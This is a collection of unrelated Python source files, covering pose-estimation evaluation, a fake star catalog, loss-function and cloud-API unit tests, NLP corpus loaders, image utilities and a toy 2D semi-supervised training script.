epoch_loss_3d_pos_procrustes += inputs_3d.shape[0] * inputs_3d.shape[1] * p_mpjpe(predicted_3d_pos, inputs)
epoch_loss_3d_vel += inputs_3d.shape[0] * inputs_3d.shape[1] * mean_velocity_error(predicted_3d_pos, inputs)
N += inputs_3d.shape[0] * inputs_3d.shape[1]
e1 = (epoch_loss_3d_pos / N) * 1000
e2 = (epoch_loss_3d_pos_procrustes / N) * 1000
e3 = (epoch_loss_3d_pos_scale / N) * 1000
ev = (epoch_loss_3d_vel / N) * 1000
er = (epoch_loss_3d_root / N) * 1000
return e1, e2, e3, ev, er
def evaluate(self, mlog, subjects_test, pose_data, action_filter, pad, causal_shift, epoch, plot=False):
all_actions = dict()
for subject in subjects_test:
# all_actions.setdefault('Sitting 1', list()).append((subject, 'Sitting 1'))
if action_filter == None:
action_keys = pose_data.get_dataset()[subject].keys()
else:
action_keys = action_filter
for action in action_keys:
all_actions.setdefault(action.split(' ')[0], list()).append((subject, action))
errors_p1 = []
errors_p2 = []
errors_p3 = []
errors_vel = []
errors_root = []
if 'CAMERA_WISE_PERFORMANCE' in self.data_config and self.data_config['CAMERA_WISE_PERFORMANCE']:
camera_dist = pose_data.get_dataset().camera_dist
for cam_idx in range(len(camera_dist)):
cam_id = camera_dist[cam_idx]
for action_key in all_actions.keys():
poses_cam, poses_act, poses_2d_act = pose_data.fetch_via_action(all_actions[action_key], camera_idx=cam_idx)
action_generator = UnchunkedGenerator(poses_cam, poses_act, poses_2d_act,
pad=pad, causal_shift=causal_shift,
kps_left=self.kps_left, kps_right=self.kps_right,
joints_left=self.joints_left, joints_right=self.joints_right)
e1, e2, e3, ev, er = self.evaluate_core(action_generator, action_key,
flip_test=self.train_config['TEST_TIME_AUGMENTATION'])
errors_p1.append(e1)
errors_p2.append(e2)
errors_p3.append(e3)
errors_vel.append(ev)
errors_root.append(er)
p1, p2, p3, p4 = round(np.mean(errors_p1), 1), round(np.mean(errors_p2), 1), round(np.mean(errors_p3), 1), round(np.mean(errors_vel), 1)
p5 = round(np.mean(errors_root), 1)
mlog.info('CAM ID {}, {} {} {} {} {}'.format(cam_id, p1, p2, p3, p4, p5))
else:
for action_key in all_actions.keys():
poses_cam, poses_act, poses_2d_act = pose_data.fetch_via_action(all_actions[action_key])
action_generator = UnchunkedGenerator(poses_cam, poses_act, poses_2d_act,
pad=pad, causal_shift=causal_shift,
kps_left=self.kps_left, kps_right=self.kps_right,
joints_left=self.joints_left, joints_right=self.joints_right)
if action_key is None:
mlog.info('----------')
else:
mlog.info('----' + action_key + '----')
e1, e2, e3, ev, er = self.evaluate_core(action_generator, action_key,
flip_test=self.train_config['TEST_TIME_AUGMENTATION'])
mlog.info('Protocol #1 Error (MPJPE): {} mm'.format(e1))
mlog.info('Protocol #2 Error (P-MPJPE): {} mm'.format(e2))
mlog.info('Protocol #3 Error (N-MPJPE): {} mm'.format(e3))
mlog.info('Velocity Error (MPJVE): {} mm'.format(ev))
mlog.info('Root Error (MRPE): {} mm'.format(er))
mlog.info('----------')
errors_p1.append(e1)
errors_p2.append(e2)
errors_p3.append(e3)
errors_vel.append(ev)
errors_root.append(er)
mlog.info('Protocol #1 (MPJPE) action-wise average: {} mm'.format(round(np.mean(errors_p1), 1)))
mlog.info('Protocol #2 (P-MPJPE) action-wise average: {} mm'.format(round(np.mean(errors_p2), 1)))
mlog.info('Protocol #3 (N-MPJPE) action-wise average: {} mm'.format(round(np.mean(errors_p3), 1)))
mlog.info('Velocity (MPJVE) action-wise average: {} mm'.format(round(np.mean(errors_vel), 1)))
mlog.info('Root (MRPE) action-wise average: {} mm'.format(round(np.mean(errors_root), 1)))
if self.plotter and plot:
self.plotter.log_metric('MPJPE', round(np.mean(errors_p1), 1), epoch)
self.plotter.log_metric('P-MPJPE', round(np.mean(errors_p2), 1), epoch)
self.plotter.log_metric('N-MPJPE', round(np.mean(errors_p3), 1), epoch)
self.plotter.log_metric('MPJVE', round(np.mean(errors_vel), 1), epoch)
def render(self, dataset, keypoints, keypoints_metadata,
pad, causal_shift, kps_left, kps_right, joints_left, joints_right, file_names=None):
viz_subject = self.plot_config['VIZ_SUBJECT']
viz_action = self.plot_config['VIZ_ACTION']
viz_camera = self.plot_config['VIZ_CAMERA']
input_keypoints = keypoints[viz_subject][viz_action][viz_camera].copy()
ground_truth = None
if self.data_config['WORLD_3D_GT_EVAL']:
if viz_subject in dataset.subjects() and viz_action in dataset[viz_subject]:
if 'positions_3d' in dataset[viz_subject][viz_action]:
ground_truth = dataset[viz_subject][viz_action]['positions_3d'][viz_camera].copy()
if ground_truth is None:
print('INFO: this action is unlabeled. Ground truth will not be rendered.')
cam = dataset.camera_info[viz_subject][viz_camera]
render_generator = UnchunkedGenerator([cam], [ground_truth], [input_keypoints],
pad=pad, causal_shift=causal_shift, augment=False,
kps_left=kps_left, kps_right=kps_right,
joints_left=joints_left, joints_right=joints_right)
prediction = self.evaluate_core(render_generator, return_predictions=True).squeeze(axis=1) # remove axis 1
if ground_truth is not None and not self.model_config['TRAJECTORY_MODEL'] and not self.data_config['RAY_ENCODING']:
# Reapply trajectory
trajectory = ground_truth[:, :1]
prediction += trajectory
# Invert camera transformation
if ground_truth is not None:
if self.data_config['RAY_ENCODING']:
pred_world = cam.normalized2world(prediction)
target_world = cam.normalized2world(ground_truth)
else:
pred_world = cam.camera2world(prediction)
target_world = cam.camera2world(ground_truth)
prediction = pred_world
ground_truth = target_world
else:
if self.data_config['RAY_ENCODING']:
pred_world = cam.normalized2world(prediction)
else:
pred_world = cam.camera2world(prediction)
prediction = pred_world
# We don't have the trajectory, but at least we can rebase the height
prediction[:, :, 2] -= np.min(prediction[:, :, 2])
anim_output = {'Reconstruction': prediction}
if ground_truth is not None:
anim_output['Ground truth'] = ground_truth
if self.data_config['RAY_ENCODING']:
pt_cam = cam.get_uv_given_cam_ray(input_keypoints)
input_keypoints = pt_cam[..., :2]
elif self.data_config['INTRINSIC_ENCODING']:
kps_orig = cam.decouple_uv_with_intrinsic(input_keypoints)
input_keypoints = kps_orig
else:
input_keypoints = image_coordinates(input_keypoints[..., :2], w=cam.res_w, h=cam.res_h)
# original video
if self.data_config['DATASET'] == '3dhp':
input_file_names = file_names[viz_subject][viz_action][viz_camera]
input_video_path = None
elif self.data_config['DATASET'] == 'humaneva':
input_file_names = None
input_video_path = None
else:
input_file_names = None
input_video_path = self.plot_config['VIZ_VIDEO']
from lib.visualization.visualization import render_animation
render_animation(input_keypoints, keypoints_metadata, anim_output,
dataset.skeleton(), dataset.fps(), viz_camera, cam.azimuth,
self.plot_config['VIZ_OUTPUT'],
limit=self.plot_config['VIZ_LIMIT'],
downsample=self.plot_config['VIZ_DOWNSAMPLE'],
size=self.plot_config['VIZ_SIZE'],
input_video_path=input_video_path,
viewport=(cam.res_w, cam.res_h),
input_video_skip=self.plot_config['VIZ_SKIP'],
input_file_names = input_file_names
)
|
11482388
|
from EXOSIMS.Prototypes.StarCatalog import StarCatalog
import numpy as np
import astropy.units as u
from astropy.coordinates import SkyCoord
class FakeCatalog_UniformAngles(StarCatalog):
"""Fake Catalog of stars separated uniformly by angle
Generate a fake catalog of stars that are uniformly separated.
Args:
ntargs (int):
Sqrt of number of target stars to generate. ntargs by ntargs grid in ra and dec.
star_dist (float):
Star distance from observer
specs:
Additional parameters passed to StarCatalog parent class
"""
def __init__(self, ntargs=20, star_dist=5, **specs):
StarCatalog.__init__(self,**specs)
# ntargs must be an integer >= 1
self.ntargs = max(int(ntargs**2), 1)
# putting it all together
raRng = np.linspace( 0,360,ntargs)
decRng = np.linspace(-90, 90,ntargs)
dists = star_dist*np.ones(ntargs**2) *u.pc
ra,dec = np.meshgrid(raRng,decRng)*u.deg
# reference star should be first on the list
coords = SkyCoord(ra.flatten(),dec.flatten(),dists,frame='icrs')
# list of astropy attributes
self.coords = coords # ICRS coordinates
self.ntargs = int(len(self.coords.ra))
self.dist = star_dist*np.ones(self.ntargs)*u.pc # distance
self.parx = self.dist.to('mas', equivalencies=u.parallax()) # parallax
self.pmra = np.zeros(self.ntargs)*u.mas/u.yr # proper motion in RA
self.pmdec = np.zeros(self.ntargs)*u.mas/u.yr # proper motion in DEC
self.rv = np.zeros(self.ntargs)*u.km/u.s # radial velocity
# list of non-astropy attributes to pass target list filters
self.Name = np.array([str(x) for x in range(self.ntargs)]) # star names
self.Spec = np.array(['G']*self.ntargs) # spectral types
self.Umag = np.zeros(self.ntargs) # U magnitude
self.Bmag = np.zeros(self.ntargs) # B magnitude
self.Vmag = 5*np.ones(self.ntargs) # V magnitude
self.Rmag = np.zeros(self.ntargs) # R magnitude
self.Imag = np.zeros(self.ntargs) # I magnitude
self.Jmag = np.zeros(self.ntargs) # J magnitude
self.Hmag = np.zeros(self.ntargs) # H magnitude
self.Kmag = np.zeros(self.ntargs) # K magnitude
self.BV = np.zeros(self.ntargs) # B-V Johnson magnitude
self.MV = self.Vmag - 5*( np.log10(star_dist) - 1 ) # absolute V magnitude
self.BC = -0.10*np.ones(self.ntargs) # bolometric correction
BM = self.MV + self.BC
L0 = 3.0128e28
BMsun = 4.74
self.L = L0*10**(0.4*(BMsun-BM)) # stellar luminosity in ln(SolLum)
self.Binary_Cut = np.zeros(self.ntargs, dtype=bool) # binary closer than 10 arcsec
# populate outspecs
self._outspec['ntargs'] = self.ntargs
|
11482441
|
import torch
import numpy as np
from matchzoo import losses
def test_hinge_loss():
true_value = torch.Tensor([[1.2], [1], [1], [1]])
pred_value = torch.Tensor([[1.2], [0.1], [0], [-0.3]])
expected_loss = torch.Tensor([(0 + 1 - 0.3 + 0) / 2.0])
loss = losses.RankHingeLoss()(pred_value, true_value)
assert torch.isclose(expected_loss, loss)
expected_loss = torch.Tensor(
[(2 + 0.1 - 1.2 + 2 - 0.3 + 0) / 2.0])
loss = losses.RankHingeLoss(margin=2)(pred_value, true_value)
assert torch.isclose(expected_loss, loss)
true_value = torch.Tensor(
[[1.2], [1], [0.8], [1], [1], [0.8]])
pred_value = torch.Tensor(
[[1.2], [0.1], [-0.5], [0], [0], [-0.3]])
expected_loss = torch.Tensor(
[(0 + 1 - 0.15) / 2.0])
loss = losses.RankHingeLoss(num_neg=2, margin=1)(
pred_value, true_value)
assert torch.isclose(expected_loss, loss)
def test_rank_crossentropy_loss():
losses.neg_num = 1
def softmax(x):
return np.exp(x) / np.sum(np.exp(x), axis=0)
true_value = torch.Tensor([[1.], [0.], [0.], [1.]])
pred_value = torch.Tensor([[0.8], [0.1], [0.8], [0.1]])
expected_loss = torch.Tensor(
[(-np.log(softmax([0.8, 0.1])[0]) - np.log(
softmax([0.8, 0.1])[1])) / 2])
loss = losses.RankCrossEntropyLoss()(pred_value, true_value)
assert torch.isclose(expected_loss, loss)
true_value = torch.Tensor([[1.], [0.], [0.], [0.], [1.], [0.]])
pred_value = torch.Tensor([[0.8], [0.1], [0.1], [0.8], [0.1], [0.1]])
expected_loss = torch.Tensor(
[(-np.log(softmax([0.8, 0.1, 0.1])[0]) - np.log(
softmax([0.8, 0.1, 0.1])[1])) / 2])
loss = losses.RankCrossEntropyLoss(num_neg=2)(
pred_value, true_value)
assert torch.isclose(expected_loss, loss)
|
11482454
|
import unittest
from cloudwanderer import URN
from ..helpers import CloudWandererCalls, ExpectedCall, MultipleResourceScenario, NoMotoMock, SingleResourceScenario
class TestNatGateways(NoMotoMock, unittest.TestCase):
nat_gateway_payload = {
"CreateTime": "2021-04-13T09:39:49.000Z",
"NatGatewayAddresses": [
{
"AllocationId": "eipalloc-11111111111111111",
"NetworkInterfaceId": "eni-11111111111111111",
"PrivateIp": "10.10.10.78",
}
],
"NatGatewayId": "nat-11111111111111111",
"State": "pending",
"SubnetId": "subnet-11111111",
"VpcId": "vpc-11111111",
"Tags": [{"Key": "Name", "Value": "test-gateway"}],
}
mock = {
"ec2": {
"describe_nat_gateways.return_value": {"NatGateways": [nat_gateway_payload]},
}
}
single_resource_scenarios = [
SingleResourceScenario(
urn=URN.from_string("urn:aws:123456789012:eu-west-2:ec2:nat_gateway:nat-11111111111111111"),
expected_results=[nat_gateway_payload],
expected_call=ExpectedCall(
"ec2", "describe_nat_gateways", [], {"NatGatewayIds": ["nat-11111111111111111"]}
),
)
]
multiple_resource_scenarios = [
MultipleResourceScenario(
arguments=CloudWandererCalls(regions=["eu-west-2"], service_names=["ec2"], resource_types=["nat_gateway"]),
expected_results=[nat_gateway_payload],
)
]
|
11482461
|
import json
import pathlib
import click
import tqdm
import candidate_data
import image_loader
import imagenet
imgnet = imagenet.ImageNetData()
cds = candidate_data.CandidateData(exclude_blacklisted_candidates=False)
loader = image_loader.ImageLoader(imgnet, cds)
all_wnids = list(sorted(list(imgnet.class_info_by_wnid.keys())))
assert len(all_wnids) == 1000
print('Downloading all candidate images ...')
for cur_wnid in tqdm.tqdm(all_wnids):
images_to_download = cds.candidates_by_wnid[cur_wnid]
images_to_download = [x['id_ours'] for x in images_to_download]
loader.load_image_bytes_batch(images_to_download, size='scaled_500', verbose=False)
if __name__ == "__main__":
download_images()
|
11482471
|
fig, ax = plt.subplots(figsize=(15, 15))
ax = gdf_gent.to_crs(3857).plot(column="no2", ax=ax, legend=True, vmax=50)
contextily.add_basemap(ax)
ax.set_axis_off()
|
11482478
|
from __future__ import absolute_import, division, unicode_literals
import treq
import json
from twisted.trial.unittest import SynchronousTestCase
from twisted.internet.task import Clock
from mimic.test.fixtures import APIMockHelper
from mimic.test.helpers import request, json_request
from mimic.rest.glance_api import GlanceApi
from mimic.core import MimicCore
from mimic.resource import MimicRoot
from mimic.canned_responses.json.glance.glance_images_json import image_schema
from mimic.model.glance_objects import random_image_list
class GlanceAPITests(SynchronousTestCase):
"""
Tests for the Glance plugin api
"""
def get_responsebody(self, r):
"""
util json response body
"""
return self.successResultOf(treq.json_content(r))
def setUp(self):
"""
Setup for glance tests
"""
helper = APIMockHelper(self, [GlanceApi()])
self.root = helper.root
self.uri = helper.uri
def test_list_images(self):
"""
List the images returned from glance
"""
req = request(self, self.root, b"GET", self.uri + '/images', b'')
resp = self.successResultOf(req)
self.assertEquals(resp.code, 200)
data = self.get_responsebody(resp)
self.assertEquals(True, 'images' in json.dumps(data))
class GlanceAdminAPITests(SynchronousTestCase):
"""
Tests for the Glance Admin API
"""
def setUp(self):
"""
Initialize core and root
"""
self.core = MimicCore(Clock(), [])
self.root = MimicRoot(self.core).app.resource()
self.uri = "/glance/v2/images"
self.create_request = {"name": "OnMetal - MIMIC", "distro": "linux"}
def create_image(self, request_json=None):
"""
Create image and validate response code.
Return newly created image.
"""
request_json = request_json or self.create_request
(response, content) = self.successResultOf(json_request(
self, self.root, b"POST", self.uri,
body=request_json))
self.assertEqual(response.code, 201)
return content
def list_images(self):
"""
List images and return response
"""
(response, content) = self.successResultOf(json_request(
self, self.root, b"GET", self.uri))
self.assertEqual(200, response.code)
for each in content['images']:
self.assertEqual(each["status"], "active")
return content
def test_list_image_schema(self):
"""
Get the image schema returned from glance admin API
"""
uri = "/glance/v2/schemas/image"
(response, content) = self.successResultOf(json_request(
self, self.root, b"GET", uri))
self.assertEqual(200, response.code)
self.assertEqual(sorted(image_schema.keys()),
sorted(content))
def test_list_images_for_admin(self):
"""
List the images returned from the glance admin api
"""
content = self.list_images()
self.assertEqual(len(random_image_list), len(content['images']))
actual_image_names = [image['name'] for image in content['images']]
expected_image_names = [each['name'] for each in random_image_list]
self.assertEqual(sorted(actual_image_names), sorted(expected_image_names))
def test_list_images_for_admin_consistently(self):
"""
List the images returned from the glance admin api
"""
content1 = self.list_images()
content2 = self.list_images()
self.assertEqual(content2, content1)
def test_create_image(self):
"""
Create Image and validate response
"""
new_image = self.create_image()
self.assertEqual(new_image['name'], self.create_request['name'])
def test_create_image_fails_with_400(self):
"""
Create Image and validate response
"""
request_jsons = [
{}, # nothing
{"name": None}, # invalid name
{"hello": "world"}, # invalid key
{"name": "valid"}, # unspecified distro
]
for each in request_jsons:
(response, content) = self.successResultOf(json_request(
self, self.root, b"POST", self.uri,
body=each))
self.assertEqual(response.code, 400)
def test_get_image(self):
"""
Create then GET Image and validate response
"""
new_image = self.create_image()
(response, content) = self.successResultOf(json_request(
self, self.root, b"GET", self.uri + '/' + new_image['id']))
self.assertEqual(200, response.code)
self.assertEqual(new_image, content)
def test_get_non_existant_image(self):
"""
Return 404 when trying to GET a non existant image.
"""
response = self.successResultOf(request(
self, self.root, b"GET", self.uri + '/' + '1111'))
self.assertEqual(404, response.code)
def test_delete_non_existant_image(self):
"""
Return 404 when trying to DELETE a non existant image.
"""
response = self.successResultOf(request(
self, self.root, b"DELETE", self.uri + '/' + '1111'))
self.assertEqual(404, response.code)
def test_delete_image(self):
"""
Create and then delete Image and validate response
"""
new_image = self.create_image()
response = self.successResultOf(request(
self, self.root, b"DELETE", self.uri + '/' + new_image['id']))
self.assertEqual(204, response.code)
response = self.successResultOf(request(
self, self.root, b"GET", self.uri + '/' + new_image['id']))
self.assertEqual(404, response.code)
def test_get_then_delete_image(self):
"""
Create and then delete Image and validate response
"""
images = self.list_images()['images']
for each in images[:2]:
response = self.successResultOf(request(
self, self.root, b"DELETE", self.uri + '/' + each['id']))
self.assertEqual(204, response.code)
response = self.successResultOf(request(
self, self.root, b"GET", self.uri + '/' + each['id']))
self.assertEqual(404, response.code)
images_after_delete = self.list_images()['images']
self.assertEqual(len(images),
len(images_after_delete) + 2)
|
11482484
|
import os
from ..utils.io import load_or_create, read_jsonl, load_pickle
from .batch_iterator import BatchIterator
from .. import config
class BaseCorpus(object):
def __init__(
self,
paths_dict,
mode="train",
use_chars=True,
force_reload=False,
train_data_proportion=1.0,
valid_data_proportion=1.0,
batch_size=64,
shuffle_batches=False,
batch_first=True,
):
self.paths = paths_dict
self.mode = mode
self.use_chars = use_chars
self.force_reload = force_reload
self.train_data_proportion = train_data_proportion
self.valid_data_proportion = valid_data_proportion
self.batch_size = batch_size
self.shuffle_batches = shuffle_batches
self.batch_first = batch_first
class MultiNLICorpus(BaseCorpus):
def __init__(
self, *args, max_prem_length=None, max_hypo_length=None, **kwargs
):
super(MultiNLICorpus, self).__init__(
config.corpora_dict["multinli"], *args, **kwargs
)
try:
token_dict = load_pickle(config.MULTINLI_TOKEN_DICT_PICKLE_PATH)
char_dict = load_pickle(config.MULTINLI_CHAR_DICT_PICKLE_PATH)
self.word2index = token_dict["token2id"]
self.char2index = char_dict["char2id"]
except FileNotFoundError:
exit(
"dict files not found. Try running the preprocessing "
"script first"
)
basename = os.path.basename(self.paths["train"])
filename_no_ext = os.path.splitext(basename)[0]
train_pickle_path = os.path.join(
config.CACHE_PATH, filename_no_ext + ".pkl"
)
self.train_data = load_or_create(
train_pickle_path,
read_jsonl,
self.paths["train"],
force_reload=self.force_reload,
)
# We use a set to eliminate duplicate entries
self.label_ids = set([example["label_id"] for example in self.train_data])
self.label_ids = list(self.label_ids)
self.train_batches = BatchIterator(
self.train_data,
self.batch_size,
data_proportion=self.train_data_proportion,
shuffle=self.shuffle_batches,
batch_first=self.batch_first,
use_chars=self.use_chars,
)
basename = os.path.basename(self.paths["dev_matched"])
filename_no_ext = os.path.splitext(basename)[0]
dev_matched_pickle_path = os.path.join(
config.CACHE_PATH, filename_no_ext + ".pkl"
)
self.dev_matched_data = load_or_create(
dev_matched_pickle_path,
read_jsonl,
self.paths["dev_matched"],
force_reload=self.force_reload,
)
self.dev_matched_batches = BatchIterator(
self.dev_matched_data,
self.batch_size,
data_proportion=self.valid_data_proportion,
shuffle=False,
batch_first=self.batch_first,
use_chars=self.use_chars,
)
# For compatibility
self.dev_batches = self.dev_matched_batches
basename = os.path.basename(self.paths["dev_mismatched"])
filename_no_ext = os.path.splitext(basename)[0]
dev_mismatched_pickle_path = os.path.join(
config.CACHE_PATH, filename_no_ext + ".pkl"
)
self.dev_mismatched_data = load_or_create(
dev_mismatched_pickle_path,
read_jsonl,
self.paths["dev_mismatched"],
force_reload=self.force_reload,
)
self.dev_mismatched_batches = BatchIterator(
self.dev_mismatched_data,
self.batch_size,
data_proportion=self.valid_data_proportion,
shuffle=False,
batch_first=self.batch_first,
use_chars=self.use_chars,
)
class SNLICorpus(BaseCorpus):
def __init__(
self, *args, max_prem_length=None, max_hypo_length=None, **kwargs
):
super(SNLICorpus, self).__init__(
config.corpora_dict["snli"], *args, **kwargs
)
try:
token_dict = load_pickle(config.SNLI_TOKEN_DICT_PICKLE_PATH)
char_dict = load_pickle(config.SNLI_CHAR_DICT_PICKLE_PATH)
self.word2index = token_dict["token2id"]
self.char2index = char_dict["char2id"]
except FileNotFoundError:
exit(
"dict files not found. Try running the preprocessing "
"script first"
)
basename = os.path.basename(self.paths["train"])
filename_no_ext = os.path.splitext(basename)[0]
train_pickle_path = os.path.join(
config.CACHE_PATH, filename_no_ext + ".pkl"
)
self.train_data = load_or_create(
train_pickle_path,
read_jsonl,
self.paths["train"],
force_reload=self.force_reload,
)
# We use a set to eliminate duplicate entries
self.label_ids = set([example["label_id"] for example in self.train_data])
self.label_ids = list(self.label_ids)
self.train_batches = BatchIterator(
self.train_data,
self.batch_size,
data_proportion=self.train_data_proportion,
shuffle=self.shuffle_batches,
batch_first=self.batch_first,
use_chars=self.use_chars,
)
basename = os.path.basename(self.paths["dev"])
filename_no_ext = os.path.splitext(basename)[0]
dev_pickle_path = os.path.join(
config.CACHE_PATH, filename_no_ext + ".pkl"
)
self.dev_data = load_or_create(
dev_pickle_path,
read_jsonl,
self.paths["dev"],
force_reload=self.force_reload,
)
self.dev_batches = BatchIterator(
self.dev_data,
self.batch_size,
data_proportion=self.valid_data_proportion,
shuffle=False,
batch_first=self.batch_first,
use_chars=self.use_chars,
)
basename = os.path.basename(self.paths["test"])
filename_no_ext = os.path.splitext(basename)[0]
test_pickle_path = os.path.join(
config.CACHE_PATH, filename_no_ext + ".pkl"
)
self.test_data = load_or_create(
test_pickle_path,
read_jsonl,
self.paths["test"],
force_reload=self.force_reload,
)
self.test_batches = BatchIterator(
self.test_data,
self.batch_size,
data_proportion=1.0,
shuffle=False,
batch_first=self.batch_first,
use_chars=self.use_chars,
)
|
11482499
|
import cv2
import numpy as np
# Function to rotate the image
def rotateImage(image, angle):
image_center = tuple(np.array(image.shape[1::-1]) / 2)
rot_mat = cv2.getRotationMatrix2D(image_center, angle, 1.0)
result = cv2.warpAffine(image, rot_mat, image.shape[1::-1], flags=cv2.INTER_LINEAR)
return result
# Function to crop top border in the image
def cropImage(image,x):
#x determine how far to cut the image
#fileb determines with what name we are going to save the image
#Determine image dimensions
height, width, channels = image.shape
crop_img = image[x:height, 0:width]
return crop_img
# Function to crop every box (there are 81 boxes in total)
def cropBox(image,x,y,h,w):
#Each side of the square / box has a side of length 10
crop_img = image[x:(x+h), y:(y+w)]
return crop_img
# Function to save the image
def saveImage(image,fileb):
new_path = "./Images/"
cv2.imwrite(new_path + fileb, image)
cv2.waitKey(0)
cv2.destroyAllWindows()
# Function to crop all borders of each box
def cropBorder(image):
#Determine image dimensions
height, width, channels = image.shape
crop_img = image[12:height-12, 12:width-12]
return crop_img
|
11482571
|
import os
from code_search import shared, serialize
from code_search.data_manager import DataManager, get_base_languages_data_manager
def rename_dedupe_definitions_keys(doc):
doc['code'] = doc.pop('function')
doc['code_tokens'] = doc.pop('function_tokens')
return doc
def rename_set_doc_keys(doc):
doc['identifier'] = doc.pop('func_name')
return doc
def get_base_language_doc_path(language: str, set_: shared.DataSet.TRAIN, idx: int) -> str:
return os.path.join(
shared.CODESEARCHNET_DATA_DIR, language, 'final', 'jsonl', str(set_), f'{language}_{set_}_{idx}')
def get_codesearchnet_language_set_corpus(language: str, set_: shared.DataSet):
if set_ == shared.DataSet.TRAIN:
file_paths = [get_base_language_doc_path(language, set_, i)
for i in range(shared.LANGUAGES_NUM_FILES[language])]
else:
file_paths = [get_base_language_doc_path(language, set_, 0)]
for file_path in file_paths:
yield from serialize.load('jsonl-gzip', file_path)
def combine_language_set_corpus(data_manager: DataManager, language: str, set_: shared.DataSet):
corpus = (rename_set_doc_keys(doc) for doc in get_codesearchnet_language_set_corpus(language, set_))
data_manager.save_language_corpus(corpus, language, set_)
def parse_dedupe_definitions(data_manager: DataManager, language: str):
dedupe_definitions_pkl_path = os.path.join(
shared.CODESEARCHNET_DATA_DIR, f'{language}_dedupe_definitions_v2')
dedupe_definitions = serialize.load('pickle', dedupe_definitions_pkl_path)
corpus = (rename_dedupe_definitions_keys(doc) for doc in dedupe_definitions)
data_manager.save_language_corpus(corpus, language, shared.DataSet.ALL)
def main():
data_manager = get_base_languages_data_manager()
for language in shared.LANGUAGES:
print(f'Preparing {language}')
parse_dedupe_definitions(data_manager, language)
for set_ in shared.DataSet.split_data_sets():
print(set_)
combine_language_set_corpus(data_manager, language, set_)
if __name__ == '__main__':
main()
|
11482582
|
import os
def create_dirs(dirs):
"""
dirs - a list of directories to create if these directories are not found
:param dirs:
:return exit_code: 0:success -1:failed
"""
try:
for dir_ in dirs:
if not os.path.exists(dir_):
os.makedirs(dir_)
return 0
except Exception as err:
print("Creating directories error: {0}".format(err))
exit(-1)
def clean_dir(dir, prefix):
"""
Clean the given dir from every file starting with prefix
:param dir:
:param filename:
:return:
"""
try:
for filename in os.listdir(dir):
if filename.startswith(prefix):
os.remove(os.path.join(dir, filename))
except Exception as err:
print("Cleaning directory error: {0}".format(err))
|
11482598
|
from ._symbol import Symbol
from plotly.graph_objs.layout.mapbox.layer import symbol
from ._line import Line
from ._fill import Fill
from ._circle import Circle
|
11482603
|
import job_helper
import click
@job_helper.job('toy2d_train', enumerate_job_names=False)
def train_toy2d(submit_config: job_helper.SubmitConfig, dataset, region_erode_radius, img_noise_std,
n_sup, balance_classes, seed,
sup_path, model, n_hidden, hidden_size, hidden_act, norm_layer,
perturb_noise_std, dist_contour_range,
conf_thresh, conf_avg,
cons_weight, cons_loss_fn, cons_no_dropout,
learning_rate, teacher_alpha,
num_epochs, batch_size, render_cons_grad, render_pred, device,
save_output):
settings = locals().copy()
del settings['submit_config']
import sys
print('Command line:')
print(' '.join(sys.argv))
print('Settings:')
print(', '.join(['{}={}'.format(k, settings[k]) for k in sorted(settings.keys())]))
import os
import numpy as np
import time
import cv2
from scipy.ndimage.morphology import distance_transform_edt
import optim_weight_ema
from toy2d import generate_data
from datapipe.seg_data import RepeatSampler
import torch, torch.nn as nn, torch.nn.functional as F
import torch.utils.data
rng = np.random.RandomState(seed)
# Generate/load the dataset
if dataset.startswith('img:'):
# Generate a dataset from a black and white image
image_path = dataset[4:]
ds = generate_data.classification_dataset_from_image(image_path, region_erode_radius, img_noise_std, n_sup, balance_classes, rng)
image = ds.image
elif dataset == 'spiral':
# Generate a spiral dataset
ds = generate_data.spiral_classification_dataset(n_sup, balance_classes, rng)
image = None
else:
print('Unknown dataset {}, should be spiral or img:<path>'.format(dataset))
return
# If a path to a supervised dataset has been provided, load it
if sup_path is not None:
ds.load_supervised(sup_path)
# If we are constraining perturbations to lie along the contours of the distance map to the ground truth class boundary
if dist_contour_range > 0.0:
if image is None:
print('Constraining perturbations to lying on distance map contours is only supported for \'image\' experiments')
return
img_1 = image >= 0.5
# Compute signed distance map to boundary
dist_1 = distance_transform_edt(img_1)
dist_0 = distance_transform_edt(~img_1)
dist_map = dist_1 * img_1 + -dist_0 * (~img_1)
else:
dist_map = None
# PyTorch device
torch_device = torch.device(device)
# Convert perturbation noise std-dev to [y,x]
try:
perturb_noise_std = np.array([float(x.strip()) for x in perturb_noise_std.split(',')])
except ValueError:
perturb_noise_std = np.array([6.0, 6.0])
# Assume that perturbation noise std-dev is in pixel space (for image experiments), so convert
perturb_noise_std_real_scale = perturb_noise_std / ds.img_scale * 2.0
perturb_noise_std_real_scale = torch.tensor(perturb_noise_std_real_scale, dtype=torch.float, device=torch_device)
# Define the neural network model (an MLP)
class Network (nn.Module):
def __init__(self):
super(Network, self).__init__()
self.drop = nn.Dropout()
hidden = []
chn_in = 2
for i in range(n_hidden):
if norm_layer == 'spectral_norm':
hidden.append(nn.utils.spectral_norm(nn.Linear(chn_in, hidden_size)))
elif norm_layer == 'weight_norm':
hidden.append(nn.utils.weight_norm(nn.Linear(chn_in, hidden_size)))
else:
hidden.append(nn.Linear(chn_in, hidden_size))
if norm_layer == 'batch_norm':
hidden.append(nn.BatchNorm1d(hidden_size))
elif norm_layer == 'group_norm':
hidden.append(nn.GroupNorm(4, hidden_size))
if hidden_act == 'relu':
hidden.append(nn.ReLU())
elif hidden_act == 'lrelu':
hidden.append(nn.LeakyReLU(0.01))
else:
raise ValueError
chn_in = hidden_size
self.hidden = nn.Sequential(*hidden)
# Final layer; 2-class output
self.l_final = nn.Linear(chn_in, 2)
def forward(self, x, use_dropout=True):
x = self.hidden(x)
if use_dropout:
x = self.drop(x)
x = self.l_final(x)
return x
# Build student network, optimizer and supervised loss criterion
student_net = Network().to(torch_device)
student_params = list(student_net.parameters())
student_optimizer = torch.optim.Adam(student_params, lr=learning_rate)
classification_criterion = nn.CrossEntropyLoss()
# Build teacher network and optimizer
if model == 'mean_teacher':
teacher_net = Network().to(torch_device)
teacher_params = list(teacher_net.parameters())
for param in teacher_params:
param.requires_grad = False
teacher_optimizer = optim_weight_ema.EMAWeightOptimizer(teacher_net, student_net, ema_alpha=teacher_alpha)
pred_net = teacher_net
else:
teacher_net = None
teacher_optimizer = None
pred_net = student_net
# Robust BCE helper
def robust_binary_crossentropy(pred, tgt):
inv_tgt = -tgt + 1.0
inv_pred = -pred + 1.0 + 1e-6
return -(tgt * torch.log(pred + 1.0e-6) + inv_tgt * torch.log(inv_pred))
# If we are constraining perturbations to lie on distance map contours, load the distance map as a Torch tensor
if dist_contour_range > 0.0:
t_dist_map = torch.tensor(dist_map[None, None, ...], dtype=torch.float, device=torch_device)
else:
t_dist_map = None
